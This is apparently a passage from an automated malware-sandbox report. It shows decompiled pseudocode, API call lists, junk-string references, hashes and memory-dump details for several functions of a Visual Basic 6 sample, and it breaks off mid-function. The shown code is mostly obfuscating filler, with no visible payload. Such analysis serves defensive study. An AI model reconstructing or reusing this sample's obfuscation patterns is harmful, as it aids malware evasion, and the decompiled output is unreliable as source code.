__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040914F
#583.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040915B
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 00409160
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 00409184
#529.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040918D
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 00409195

Strings

Betjeningens, xrefs: 00409170
penplotter, xrefs: 0040912A

Memory Dump Source

Source File: 00000000.00000002.457742427.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.457737838.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.457750719.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.457755682.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$#529Free$#583#671Chkstk
String ID: Betjeningens$penplotter
API String ID: 3337120450-2381333887
Opcode ID: d2bc5d0476d7c47cc9ac12a32bfd9175508291fc768841ff68fe1d8cbd882733
Instruction ID: 3fda23cea9efe5249a5ce292e17dafacb2dfa0169ae3acde77114e326e63ea2b
Opcode Fuzzy Hash: d2bc5d0476d7c47cc9ac12a32bfd9175508291fc768841ff68fe1d8cbd882733
Instruction Fuzzy Hash: 32113BB0510519BADB04AF91DD8AEEEBBB8FB44704F44467EF081760E1DB7C1808876D

Uniqueness

Uniqueness Score: -1.00%

Function 0040988F, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0040988F(void* __ebx, void* __ecx, void* __edi, void* __esi, long long __fp0, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				long long _v32;
				intOrPtr _v40;
				char _v48;
				char _v64;
				char* _v72;
				intOrPtr _v80;
				short _v84;
				intOrPtr _t25;
				char* _t26;
				char* _t32;
				intOrPtr _t48;
				long long _t52;

				_t52 = __fp0;
				_push(0x401426);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t48;
				_t25 = 0x44;
				L00401420();
				_v12 = _t48;
				_v8 = 0x4012d8;
				L0040163C();
				L00401576();
				_v40 = _t25;
				_v48 = 8;
				_t26 =  &_v48;
				_push(_t26);
				L0040157C();
				_v84 =  ~(0 | _t26 != 0x0000ffff);
				L0040164E();
				if(_v84 != 0) {
					_push(L"Laanendes7");
					_push(0xcb);
					_push(0xffffffff);
					_push(0x20);
					L004015D6();
				}
				_v72 = L"9/9/9";
				_v80 = 8;
				L004015BE();
				_push( &_v48);
				_push( &_v64);
				L0040156A();
				_push( &_v64);
				L00401570();
				_v32 = _t52;
				_push( &_v64);
				_t32 =  &_v48;
				_push(_t32);
				_push(2);
				L00401600();
				asm("wait");
				_push(E00409979);
				L0040166C();
				return _t32;
			}

0x0040988f
0x00409894
0x0040989f
0x004098a0
0x004098a9
0x004098aa
0x004098b2
0x004098b5
0x004098c2
0x004098c7
0x004098cc
0x004098cf
0x004098d6
0x004098d9
0x004098da
0x004098ea
0x004098f1
0x004098fc
0x004098fe
0x00409903
0x00409908
0x0040990a
0x0040990c
0x0040990c
0x00409911
0x00409918
0x00409925
0x0040992d
0x00409931
0x00409932
0x0040993a
0x0040993b
0x00409940
0x00409946
0x00409947
0x0040994a
0x0040994b
0x0040994d
0x00409955
0x00409956
0x00409973
0x00409978

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 004098AA
__vbaStrCopy.MSVBVM60(?,?,?,?,00401426), ref: 004098C2
#609.MSVBVM60(?,?,?,?,00401426), ref: 004098C7
#557.MSVBVM60(00000008,?,?,?,?,?,?,?,?,00401426), ref: 004098DA
__vbaFreeVar.MSVBVM60(00000008,?,?,?,?,?,?,?,?,00401426), ref: 004098F1
__vbaFileOpen.MSVBVM60(00000020,000000FF,000000CB,Laanendes7,00000008,?,?,?,?,?,?,?,?,00401426), ref: 0040990C
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,00000008), ref: 00409925
#687.MSVBVM60(?,00000008,?,?,?,?,?,?,?,00000008), ref: 00409932
__vbaDateVar.MSVBVM60(?,?,00000008,?,?,?,?,?,?,?,00000008), ref: 0040993B
__vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,00000008,?,?,?,?,?,?,?,00000008), ref: 0040994D
__vbaFreeStr.MSVBVM60(00409979), ref: 00409973

Strings

Laanendes7, xrefs: 004098FE
9/9/9, xrefs: 00409911

Memory Dump Source

Source File: 00000000.00000002.457742427.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.457737838.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.457750719.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.457755682.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#557#609#687ChkstkCopyDateFileListOpen
String ID: 9/9/9$Laanendes7
API String ID: 1694687497-38042795
Opcode ID: cec2fd23828f9474c07b32fc73bd596cd98a2701434b9e9f06c11b01122a2cc8
Instruction ID: 6233206ea1ccb76bb25826f2921bbfe566b991a5bfe03cff56d5c1f217cb28e4
Opcode Fuzzy Hash: cec2fd23828f9474c07b32fc73bd596cd98a2701434b9e9f06c11b01122a2cc8
Instruction Fuzzy Hash: 3A2138B1D00209AACB10EBA5CC46FEEB7B8AF04704F10853AF111B61E1EB7899058B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040A112, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0040A112(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, long long __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long* _v16;
				intOrPtr _v28;
				char _v44;
				intOrPtr _v52;
				char _v60;
				intOrPtr _v68;
				char _v76;
				intOrPtr _v84;
				char _v92;
				char* _v100;
				intOrPtr _v108;
				char* _t36;
				void* _t53;
				void* _t55;
				long long* _t56;

				_t56 = _t55 - 0xc;
				 *[fs:0x0] = _t56;
				L00401420();
				_v16 = _t56;
				_v12 = 0x401378;
				_v8 = 0;
				_t36 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401426, _t53);
				asm("fldz");
				 *_t56 = __fp0;
				L004015B8();
				L004015F4();
				asm("fcomp qword [0x401280]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags != 0) {
					_v100 = L"Ankestyrelses";
					_v108 = 8;
					L004015BE();
					_t36 =  &_v44;
					_push(_t36);
					L004015C4();
					L0040164E();
				}
				_push(0x402a94);
				L004014C2();
				if(_t36 != 0x61) {
					_v84 = 0x80020004;
					_v92 = 0xa;
					_v68 = 0x80020004;
					_v76 = 0xa;
					_v52 = 0x80020004;
					_v60 = 0xa;
					_v100 = L"Stavlygterne8";
					_v108 = 8;
					L004015BE();
					_push( &_v92);
					_push( &_v76);
					_push( &_v60);
					_push(0);
					_push( &_v44);
					L004014FE();
					_push( &_v92);
					_push( &_v76);
					_push( &_v60);
					_t36 =  &_v44;
					_push(_t36);
					_push(4);
					L00401600();
				}
				_v28 =  *0x401370;
				asm("wait");
				_push(E0040A24B);
				return _t36;
			}

0x0040a115
0x0040a124
0x0040a130
0x0040a138
0x0040a13b
0x0040a142
0x0040a151
0x0040a154
0x0040a158
0x0040a15b
0x0040a160
0x0040a165
0x0040a16b
0x0040a16d
0x0040a16e
0x0040a170
0x0040a177
0x0040a184
0x0040a189
0x0040a18c
0x0040a18d
0x0040a195
0x0040a195
0x0040a19a
0x0040a19f
0x0040a1a8
0x0040a1aa
0x0040a1b1
0x0040a1b8
0x0040a1bf
0x0040a1c6
0x0040a1cd
0x0040a1d4
0x0040a1db
0x0040a1e8
0x0040a1f0
0x0040a1f4
0x0040a1f8
0x0040a1f9
0x0040a1fe
0x0040a1ff
0x0040a207
0x0040a20b
0x0040a20f
0x0040a210
0x0040a213
0x0040a214
0x0040a216
0x0040a21b
0x0040a224
0x0040a227
0x0040a228
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0040A130
#583.MSVBVM60(?,?,?,?,?,?,00401426), ref: 0040A15B
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,00401426), ref: 0040A160
__vbaVarDup.MSVBVM60 ref: 0040A184
#529.MSVBVM60(?), ref: 0040A18D
__vbaFreeVar.MSVBVM60(?), ref: 0040A195
#516.MSVBVM60(00402A94,?,?,?,?,?,?,00401426), ref: 0040A19F
__vbaVarDup.MSVBVM60(00402A94,?), ref: 0040A1E8
#595.MSVBVM60(?,00000000,0000000A,0000000A,0000000A), ref: 0040A1FF
__vbaFreeVarList.MSVBVM60(00000004,?,0000000A,0000000A,0000000A,?,00000000,0000000A,0000000A,0000000A), ref: 0040A216

Strings

Stavlygterne8, xrefs: 0040A1D4
Ankestyrelses, xrefs: 0040A170

Memory Dump Source

Source File: 00000000.00000002.457742427.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.457737838.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.457750719.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.457755682.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#516#529#583#595ChkstkList
String ID: Ankestyrelses$Stavlygterne8
API String ID: 1605959742-1351759999
Opcode ID: 180eb3c996cc04292fb75b87e269790ed9bd05845288b8aa44b35f331e9de1bc
Instruction ID: 5b98b4d4f69242704afeb87f9abf8a91ffaec62cd5e6e34bb67ab053ed288d0b
Opcode Fuzzy Hash: 180eb3c996cc04292fb75b87e269790ed9bd05845288b8aa44b35f331e9de1bc
Instruction Fuzzy Hash: 9031D6B1900249EBDB00EFD1C989FDEBBB8FB04704F44412AF501BB1A1DBB95589CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040A683, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0040A683(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v28;
				void* _v32;
				signed int _v36;
				void* _v40;
				intOrPtr* _v60;
				signed int _v64;
				intOrPtr* _v68;
				signed int _v72;
				intOrPtr _v84;
				intOrPtr* _v88;
				signed int _v92;
				signed int _v96;
				signed int _t54;
				signed int _t59;
				signed int _t60;
				void* _t68;
				void* _t70;
				intOrPtr _t71;

				_t71 = _t70 - 0xc;
				 *[fs:0x0] = _t71;
				L00401420();
				_v16 = _t71;
				_v12 = 0x4013b8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x48,  *[fs:0x0], 0x401426, _t68);
				if( *0x40c33c != 0) {
					_v88 = 0x40c33c;
				} else {
					_push(0x40c33c);
					_push(0x4026c8);
					L0040165A();
					_v88 = 0x40c33c;
				}
				_v60 =  *_v88;
				_t54 =  *((intOrPtr*)( *_v60 + 0x14))(_v60,  &_v40);
				asm("fclex");
				_v64 = _t54;
				if(_v64 >= 0) {
					_v92 = _v92 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x4026b8);
					_push(_v60);
					_push(_v64);
					L00401654();
					_v92 = _t54;
				}
				_v68 = _v40;
				_t59 =  *((intOrPtr*)( *_v68 + 0x110))(_v68,  &_v36);
				asm("fclex");
				_v72 = _t59;
				if(_v72 >= 0) {
					_v96 = _v96 & 0x00000000;
				} else {
					_push(0x110);
					_push(0x402918);
					_push(_v68);
					_push(_v72);
					L00401654();
					_v96 = _t59;
				}
				_t60 = _v36;
				_v84 = _t60;
				_v36 = _v36 & 0x00000000;
				L00401678();
				L004015E8();
				_push(2);
				_push("ABC");
				_push(0x402938);
				_push(0);
				L00401564();
				if(_t60 != 3) {
					_push(L"GUMME");
					_push(0x2e);
					_push(0xffffffff);
					_push(0x20);
					L004015D6();
				}
				_v28 = 0x228e;
				_push(E0040A7D5);
				L0040166C();
				return _t60;
			}

0x0040a686
0x0040a695
0x0040a69f
0x0040a6a7
0x0040a6aa
0x0040a6b1
0x0040a6c0
0x0040a6ca
0x0040a6e4
0x0040a6cc
0x0040a6cc
0x0040a6d1
0x0040a6d6
0x0040a6db
0x0040a6db
0x0040a6f0
0x0040a6ff
0x0040a702
0x0040a704
0x0040a70b
0x0040a724
0x0040a70d
0x0040a70d
0x0040a70f
0x0040a714
0x0040a717
0x0040a71a
0x0040a71f
0x0040a71f
0x0040a72b
0x0040a73a
0x0040a740
0x0040a742
0x0040a749
0x0040a765
0x0040a74b
0x0040a74b
0x0040a750
0x0040a755
0x0040a758
0x0040a75b
0x0040a760
0x0040a760
0x0040a769
0x0040a76c
0x0040a76f
0x0040a779
0x0040a781
0x0040a786
0x0040a788
0x0040a78d
0x0040a792
0x0040a794
0x0040a79c
0x0040a79e
0x0040a7a3
0x0040a7a5
0x0040a7a7
0x0040a7a9
0x0040a7a9
0x0040a7ae
0x0040a7b4
0x0040a7cf
0x0040a7d4

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0040A69F
__vbaNew2.MSVBVM60(004026C8,0040C33C,?,?,?,?,00401426), ref: 0040A6D6
__vbaHresultCheckObj.MSVBVM60(00000000,?,004026B8,00000014), ref: 0040A71A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402918,00000110), ref: 0040A75B
__vbaStrMove.MSVBVM60 ref: 0040A779
__vbaFreeObj.MSVBVM60 ref: 0040A781
__vbaInStr.MSVBVM60(00000000,00402938,ABC,00000002), ref: 0040A794
__vbaFileOpen.MSVBVM60(00000020,000000FF,0000002E,GUMME,00000000,00402938,ABC,00000002), ref: 0040A7A9
__vbaFreeStr.MSVBVM60(0040A7D5,00000000,00402938,ABC,00000002), ref: 0040A7CF

Strings

GUMME, xrefs: 0040A79E
ABC, xrefs: 0040A788

Memory Dump Source

Source File: 00000000.00000002.457742427.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.457737838.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.457750719.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.457755682.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$ChkstkFileMoveNew2Open
String ID: ABC$GUMME
API String ID: 3746238256-2158301107
Opcode ID: 87c16d03ca5d7ac3b1ce6da804fec3232a3ad02e65a762af652f361a92a74774
Instruction ID: 7717e208a5b3c1d4cf2a6973c3007bcc972d01d71e26a447819060b02ecf96d4
Opcode Fuzzy Hash: 87c16d03ca5d7ac3b1ce6da804fec3232a3ad02e65a762af652f361a92a74774
Instruction Fuzzy Hash: 12410370940208EFCB00EF95C98ABDDBBB0BF18704F20852AF101BB2E1D7B999558B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A586, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E0040A586(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v28;
				void* _v32;
				intOrPtr _v40;
				char _v48;
				short _v68;
				void* _t20;
				signed int _t21;
				short _t25;
				void* _t33;
				void* _t35;
				intOrPtr _t36;

				_t36 = _t35 - 0xc;
				 *[fs:0x0] = _t36;
				L00401420();
				_v16 = _t36;
				_v12 = 0x4013a8;
				_v8 = 0;
				_t20 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x34,  *[fs:0x0], 0x401426, _t33);
				_push(0x40298c);
				L0040153A();
				if(_t20 != 2) {
					_push(L"Lombard");
					L004014EC();
				}
				_v40 = 2;
				_v48 = 2;
				_t21 =  &_v48;
				_push(_t21);
				_push(1);
				_push(L"FGFG");
				L004014E6();
				L00401678();
				_push(_t21);
				_push(0x402b78);
				L0040167E();
				asm("sbb eax, eax");
				_v68 =  ~( ~( ~_t21));
				L0040166C();
				L0040164E();
				_t25 = _v68;
				if(_t25 != 0) {
					L004014E0();
				}
				_v28 = 0x34d1;
				_push(E0040A65A);
				return _t25;
			}

0x0040a589
0x0040a598
0x0040a5a2
0x0040a5aa
0x0040a5ad
0x0040a5b4
0x0040a5c3
0x0040a5c6
0x0040a5cb
0x0040a5d3
0x0040a5d5
0x0040a5da
0x0040a5da
0x0040a5df
0x0040a5e6
0x0040a5ed
0x0040a5f0
0x0040a5f1
0x0040a5f3
0x0040a5f8
0x0040a602
0x0040a607
0x0040a608
0x0040a60d
0x0040a614
0x0040a61a
0x0040a621
0x0040a629
0x0040a62e
0x0040a634
0x0040a636
0x0040a636
0x0040a63b
0x0040a641
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0040A5A2
__vbaI4Str.MSVBVM60(0040298C,?,?,?,?,00401426), ref: 0040A5CB
#531.MSVBVM60(Lombard,0040298C,?,?,?,?,00401426), ref: 0040A5DA
#628.MSVBVM60(FGFG,00000001,00000002), ref: 0040A5F8
__vbaStrMove.MSVBVM60(FGFG,00000001,00000002), ref: 0040A602
__vbaStrCmp.MSVBVM60(00402B78,00000000,FGFG,00000001,00000002), ref: 0040A60D
__vbaFreeStr.MSVBVM60(00402B78,00000000,FGFG,00000001,00000002), ref: 0040A621
__vbaFreeVar.MSVBVM60(00402B78,00000000,FGFG,00000001,00000002), ref: 0040A629
__vbaEnd.MSVBVM60(00402B78,00000000,FGFG,00000001,00000002), ref: 0040A636

Strings

Lombard, xrefs: 0040A5D5
FGFG, xrefs: 0040A5F3

Memory Dump Source

Source File: 00000000.00000002.457742427.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.457737838.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.457750719.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.457755682.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#531#628ChkstkMove
String ID: FGFG$Lombard
API String ID: 845745086-2614402114
Opcode ID: 2ae22b9e48efcebdaf9e48b56db0f41713a398bbd4d0173391ef9c71722bc1a8
Instruction ID: 9fdb69bf66d06d6083e6881a172c16cf6c812095056c41ce3c78e09950d1d54e
Opcode Fuzzy Hash: 2ae22b9e48efcebdaf9e48b56db0f41713a398bbd4d0173391ef9c71722bc1a8
Instruction Fuzzy Hash: 0E115470A40209ABCB10AFE5CD4ABAE77B4AF04744F54843BF401B71E1DBBD5905CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00408F02, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E00408F02(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v32;
				signed int _v36;
				char _v40;
				signed char _v44;
				signed int _v48;
				intOrPtr* _v52;
				signed int _v56;
				signed char _v68;
				signed char* _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _t68;
				signed int _t73;
				signed char _t74;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				signed long long _t92;

				_t88 = _t87 - 0xc;
				 *[fs:0x0] = _t88;
				L00401420();
				_v16 = _t88;
				_v12 = 0x401270;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x40,  *[fs:0x0], 0x401426, _t85);
				if( *0x40c33c != 0) {
					_v72 = 0x40c33c;
				} else {
					_push(0x40c33c);
					_push(0x4026c8);
					L0040165A();
					_v72 = 0x40c33c;
				}
				_v44 =  *_v72;
				_t68 =  *((intOrPtr*)( *_v44 + 0x14))(_v44,  &_v40);
				asm("fclex");
				_v48 = _t68;
				if(_v48 >= 0) {
					_v76 = _v76 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x4026b8);
					_push(_v44);
					_push(_v48);
					L00401654();
					_v76 = _t68;
				}
				_v52 = _v40;
				_t73 =  *((intOrPtr*)( *_v52 + 0x130))(_v52,  &_v36);
				asm("fclex");
				_v56 = _t73;
				if(_v56 >= 0) {
					_v80 = _v80 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x402918);
					_push(_v52);
					_push(_v56);
					L00401654();
					_v80 = _t73;
				}
				_t74 = _v36;
				_v68 = _t74;
				_v36 = _v36 & 0x00000000;
				L00401678();
				L004015E8();
				_push(2);
				_push("ABC");
				_push(0x402938);
				_push(0);
				L004015D0();
				if(_t74 != 5) {
					_t92 =  *0x401268 *  *0x401260;
					asm("fnstsw ax");
					if((_t74 & 0x0000000d) != 0) {
						return __imp____vbaFPException();
					}
					_v84 = _t92;
					_v76 = _v84;
					_t74 =  *((intOrPtr*)( *_a4 + 0x84))(_a4,  &_v40);
					asm("fclex");
					_v44 = _t74;
					if(_v44 >= 0) {
						_v88 = _v88 & 0x00000000;
					} else {
						_push(0x84);
						_push(0x40246c);
						_push(_a4);
						_push(_v44);
						L00401654();
						_v88 = _t74;
					}
				}
				_v32 =  *0x401258;
				asm("wait");
				_push(E0040909F);
				L0040166C();
				return _t74;
			}

0x00408f05
0x00408f14
0x00408f1e
0x00408f26
0x00408f29
0x00408f30
0x00408f3f
0x00408f49
0x00408f63
0x00408f4b
0x00408f4b
0x00408f50
0x00408f55
0x00408f5a
0x00408f5a
0x00408f6f
0x00408f7e
0x00408f81
0x00408f83
0x00408f8a
0x00408fa3
0x00408f8c
0x00408f8c
0x00408f8e
0x00408f93
0x00408f96
0x00408f99
0x00408f9e
0x00408f9e
0x00408faa
0x00408fb9
0x00408fbf
0x00408fc1
0x00408fc8
0x00408fe4
0x00408fca
0x00408fca
0x00408fcf
0x00408fd4
0x00408fd7
0x00408fda
0x00408fdf
0x00408fdf
0x00408fe8
0x00408feb
0x00408fee
0x00408ff8
0x00409000
0x00409005
0x00409007
0x0040900c
0x00409011
0x00409013
0x0040901b
0x00409023
0x00409029
0x0040902d
0x0040142c
0x0040142c
0x00409033
0x0040903a
0x00409045
0x0040904b
0x0040904d
0x00409054
0x00409070
0x00409056
0x00409056
0x0040905b
0x00409060
0x00409063
0x00409066
0x0040906b
0x0040906b
0x00409054
0x0040907a
0x0040907d
0x0040907e
0x00409099
0x0040909e

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 00408F1E
__vbaNew2.MSVBVM60(004026C8,0040C33C,?,?,?,?,00401426), ref: 00408F55
__vbaHresultCheckObj.MSVBVM60(00000000,?,004026B8,00000014), ref: 00408F99
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402918,00000130), ref: 00408FDA
__vbaStrMove.MSVBVM60(00000000,?,00402918,00000130), ref: 00408FF8
__vbaFreeObj.MSVBVM60(00000000,?,00402918,00000130), ref: 00409000
__vbaInStrB.MSVBVM60(00000000,00402938,ABC,00000002), ref: 00409013
__vbaHresultCheckObj.MSVBVM60(00000000,00401270,0040246C,00000084,?,00000000,00402938,ABC,00000002), ref: 00409066
__vbaFreeStr.MSVBVM60(0040909F,00000000,00402938,ABC,00000002), ref: 00409099

Strings

ABC, xrefs: 00409007

Memory Dump Source

Source File: 00000000.00000002.457742427.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.457737838.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.457750719.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.457755682.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$Free$ChkstkMoveNew2
String ID: ABC
API String ID: 670677746-2743272264
Opcode ID: 83eb4981ca2865af99953389e3689b9b10298cab2d8b2a60599152bdf13f9eea
Instruction ID: 00ce5b842e561b6023072825fc43f3301638cee19ae3d2255abcea1739aa4e8f
Opcode Fuzzy Hash: 83eb4981ca2865af99953389e3689b9b10298cab2d8b2a60599152bdf13f9eea
Instruction Fuzzy Hash: 9541F070900209EFCB00EFA5D989BDDBBB1BB18714F10816AF142BB2E1C7795995CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00408E1B, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00408E1B(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				char _v36;
				char _v44;
				short _v64;
				char* _t27;
				short _t28;
				void* _t40;
				void* _t42;
				intOrPtr _t43;

				_t43 = _t42 - 0xc;
				 *[fs:0x0] = _t43;
				L00401420();
				_v16 = _t43;
				_v12 = 0x401248;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x30,  *[fs:0x0], 0x401426, _t40);
				_v36 = 2;
				_v44 = 2;
				_push( &_v44);
				L004015E2();
				L00401678();
				L0040164E();
				_v36 = 0x845a5d;
				_v44 = 3;
				_t27 =  &_v44;
				_push(_t27);
				L004015DC();
				_v64 =  ~(0 | _t27 != 0x0000ffff);
				L0040164E();
				_t28 = _v64;
				if(_t28 != 0) {
					_push(L"Mislike");
					_push(0x5b);
					_push(0xffffffff);
					_push(0x20);
					L004015D6();
				}
				_push(E00408EE3);
				L0040166C();
				return _t28;
			}

0x00408e1e
0x00408e2d
0x00408e37
0x00408e3f
0x00408e42
0x00408e49
0x00408e58
0x00408e5b
0x00408e62
0x00408e6c
0x00408e6d
0x00408e77
0x00408e7f
0x00408e84
0x00408e8b
0x00408e92
0x00408e95
0x00408e96
0x00408ea6
0x00408ead
0x00408eb2
0x00408eb8
0x00408eba
0x00408ebf
0x00408ec1
0x00408ec3
0x00408ec5
0x00408ec5
0x00408eca
0x00408edd
0x00408ee2

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 00408E37
#536.MSVBVM60(00000002), ref: 00408E6D
__vbaStrMove.MSVBVM60(00000002), ref: 00408E77
__vbaFreeVar.MSVBVM60(00000002), ref: 00408E7F
#561.MSVBVM60(00000003,00000002), ref: 00408E96
__vbaFreeVar.MSVBVM60(00000003,00000002), ref: 00408EAD
__vbaFileOpen.MSVBVM60(00000020,000000FF,0000005B,Mislike,00000003,00000002), ref: 00408EC5
__vbaFreeStr.MSVBVM60(00408EE3,00000003,00000002), ref: 00408EDD

Strings

Mislike, xrefs: 00408EBA

Memory Dump Source

Source File: 00000000.00000002.457742427.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.457737838.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.457750719.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.457755682.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#536#561ChkstkFileMoveOpen
String ID: Mislike
API String ID: 36235136-2753466597
Opcode ID: 47947ef7c7a2600c7394cc5e54e87570c10a62827e11f4b549e644811e618c50
Instruction ID: 74efc28dd1504f48375141e8e46b42164e2506ab7e01b5b16a0a93a119a7bb45
Opcode Fuzzy Hash: 47947ef7c7a2600c7394cc5e54e87570c10a62827e11f4b549e644811e618c50
Instruction Fuzzy Hash: 1D111675A00208ABCB10EBA1CC5ABDEBBB8BF04714F54453AF101BA2E1DB789645CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040A96A, Relevance: 13.6, APIs: 9, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0040A96A(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v28;
				char _v32;
				void* _v36;
				void* _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr* _v52;
				signed int _v56;
				intOrPtr* _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _t73;
				signed int _t78;
				signed int _t83;
				signed int _t87;
				void* _t95;
				void* _t97;
				intOrPtr _t98;

				_t98 = _t97 - 0xc;
				 *[fs:0x0] = _t98;
				L00401420();
				_v16 = _t98;
				_v12 = 0x4013d8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x3c,  *[fs:0x0], 0x401426, _t95);
				if( *0x40c33c != 0) {
					_v68 = 0x40c33c;
				} else {
					_push(0x40c33c);
					_push(0x4026c8);
					L0040165A();
					_v68 = 0x40c33c;
				}
				_v44 =  *_v68;
				_t73 =  *((intOrPtr*)( *_v44 + 0x14))(_v44,  &_v36);
				asm("fclex");
				_v48 = _t73;
				if(_v48 >= 0) {
					_v72 = _v72 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x4026b8);
					_push(_v44);
					_push(_v48);
					L00401654();
					_v72 = _t73;
				}
				_v52 = _v36;
				_t78 =  *((intOrPtr*)( *_v52 + 0x140))(_v52,  &_v40);
				asm("fclex");
				_v56 = _t78;
				if(_v56 >= 0) {
					_v76 = _v76 & 0x00000000;
				} else {
					_push(0x140);
					_push(0x402918);
					_push(_v52);
					_push(_v56);
					L00401654();
					_v76 = _t78;
				}
				_v28 = _v40;
				L004015E8();
				_t83 =  *((intOrPtr*)( *_a4 + 0xa8))(_a4,  &_v32);
				asm("fclex");
				_v44 = _t83;
				if(_v44 >= 0) {
					_v80 = _v80 & 0x00000000;
				} else {
					_push(0xa8);
					_push(0x40246c);
					_push(_a4);
					_push(_v44);
					L00401654();
